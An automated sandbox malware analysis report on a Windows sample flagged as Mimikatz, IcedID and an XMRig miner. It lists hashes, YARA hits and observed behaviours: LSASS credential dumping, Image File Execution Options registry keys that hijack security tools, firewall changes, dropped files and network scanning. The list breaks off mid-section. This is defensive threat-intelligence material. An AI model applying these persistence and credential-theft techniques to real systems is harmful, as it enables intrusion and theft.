Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-01-2025 01:47
Behavioral task
behavioral1
Sample
2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe
-
Size
13.6MB
-
MD5
fe0f8452b06a16543cc6b6b8aaa9a629
-
SHA1
08ab118efddfbefe20e02e52c5bb2a8620a349cb
-
SHA256
8d9b125fdc7ea077e17ade8eaf0436ede1c053be4217cb15ad0e8824493fd06b
-
SHA512
d14cd32127bd9dbb072840b6dec285f3d97c92fa8a54f93c56b964a938a6467843fd288912d152ecd942053f20481ec0bab57e49becae575684009c97f90cc98
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 772 created 2148 772 zghnuwi.exe 38 -
Xmrig family
-
Contacts a large (30308) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1236-180-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-185-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-202-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-213-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-220-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-233-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-248-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-499-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-500-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-502-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-754-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig behavioral2/memory/1236-755-0x00007FF78D370000-0x00007FF78D490000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1996-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/1996-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x000a000000023b73-6.dat mimikatz behavioral2/memory/3344-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/2852-138-0x00007FF68CC60000-0x00007FF68CD4E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts zghnuwi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts zghnuwi.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3956 netsh.exe 1884 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 3344 zghnuwi.exe 772 zghnuwi.exe 3136 wpcap.exe 552 igadlieeu.exe 2852 vfshost.exe 2964 eqelmsiua.exe 4300 xohudmc.exe 3320 kcuyyg.exe 1236 indtey.exe 2360 eqelmsiua.exe 2968 zghnuwi.exe 2408 eqelmsiua.exe 3740 eqelmsiua.exe 1524 eqelmsiua.exe 4504 eqelmsiua.exe 5100 eqelmsiua.exe 3008 eqelmsiua.exe 1120 eqelmsiua.exe 2344 eqelmsiua.exe 4968 eqelmsiua.exe 1348 eqelmsiua.exe 1220 eqelmsiua.exe 4060 eqelmsiua.exe 2300 eqelmsiua.exe 3136 eqelmsiua.exe 456 eqelmsiua.exe 5092 eqelmsiua.exe 4832 hqnaebagm.exe 632 zghnuwi.exe -
Loads dropped DLL 12 IoCs
pid Process 3136 wpcap.exe 3136 wpcap.exe 3136 wpcap.exe 3136 wpcap.exe 3136 wpcap.exe 3136 wpcap.exe 3136 wpcap.exe 3136 wpcap.exe 3136 wpcap.exe 552 igadlieeu.exe 552 igadlieeu.exe 552 igadlieeu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F zghnuwi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F zghnuwi.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zghnuwi.exe File created C:\Windows\SysWOW64\kcuyyg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\kcuyyg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zghnuwi.exe -
resource yara_rule behavioral2/memory/2852-136-0x00007FF68CC60000-0x00007FF68CD4E000-memory.dmp upx behavioral2/files/0x0008000000023c55-135.dat upx behavioral2/memory/2852-138-0x00007FF68CC60000-0x00007FF68CD4E000-memory.dmp upx behavioral2/files/0x0007000000023c68-141.dat upx behavioral2/memory/2964-142-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/2964-159-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/files/0x0007000000023c65-163.dat upx behavioral2/memory/1236-164-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/2360-170-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/2408-178-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/1236-180-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/3740-183-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/1236-185-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/1524-188-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/4504-192-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/5100-196-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/3008-200-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/1236-202-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/1120-205-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/2344-209-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/1236-213-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/4968-214-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/1348-218-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/1236-220-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/1220-223-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/4060-227-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/2300-230-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/3136-232-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/1236-233-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/456-235-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/5092-237-0x00007FF7C5140000-0x00007FF7C519B000-memory.dmp upx behavioral2/memory/1236-248-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/1236-499-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/1236-500-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/1236-502-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/1236-754-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx behavioral2/memory/1236-755-0x00007FF78D370000-0x00007FF78D490000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\uqrutnuy\zghnuwi.exe 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe File created C:\Windows\bliinatya\UnattendGC\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\Corporate\vfshost.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\coli-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\tucl-1.dll zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\ip.txt zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\trch-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\zlib1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\svschost.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\libxml2.dll zghnuwi.exe File created C:\Windows\ime\zghnuwi.exe zghnuwi.exe File created C:\Windows\uqrutnuy\zghnuwi.exe 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe File created C:\Windows\bliinatya\UnattendGC\specials\schoedcl.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\scan.bat zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\wpcap.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\tibe-2.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\docmicfg.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\vimpcsvc.xml zghnuwi.exe File created C:\Windows\uqrutnuy\spoolsrv.xml zghnuwi.exe File created C:\Windows\uqrutnuy\vimpcsvc.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\AppCapture32.dll zghnuwi.exe File opened for modification C:\Windows\bliinatya\Corporate\log.txt cmd.exe File created C:\Windows\bliinatya\rtbnheisb\igadlieeu.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\cnli-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\libeay32.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\vimpcsvc.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\AppCapture64.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\exma-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\posh-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\ssleay32.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\schoedcl.xml zghnuwi.exe File created C:\Windows\uqrutnuy\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\Shellcode.ini zghnuwi.exe File created C:\Windows\bliinatya\upbdrjv\swrpwe.exe zghnuwi.exe File opened for modification C:\Windows\bliinatya\rtbnheisb\Packet.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\crli-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\spoolsrv.exe zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\Corporate\mimidrv.sys zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\wpcap.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\trfo-2.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\xdvl-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\docmicfg.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\vimpcsvc.xml zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\Packet.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\schoedcl.xml zghnuwi.exe File created C:\Windows\uqrutnuy\schoedcl.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\schoedcl.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\svschost.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\vimpcsvc.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\ucl.dll zghnuwi.exe File created C:\Windows\uqrutnuy\docmicfg.xml zghnuwi.exe File created C:\Windows\bliinatya\Corporate\mimilib.dll zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\hqnaebagm.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\docmicfg.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\docmicfg.xml zghnuwi.exe File opened for modification C:\Windows\bliinatya\rtbnheisb\Result.txt hqnaebagm.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4816 sc.exe 3244 sc.exe 3324 sc.exe 3600 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 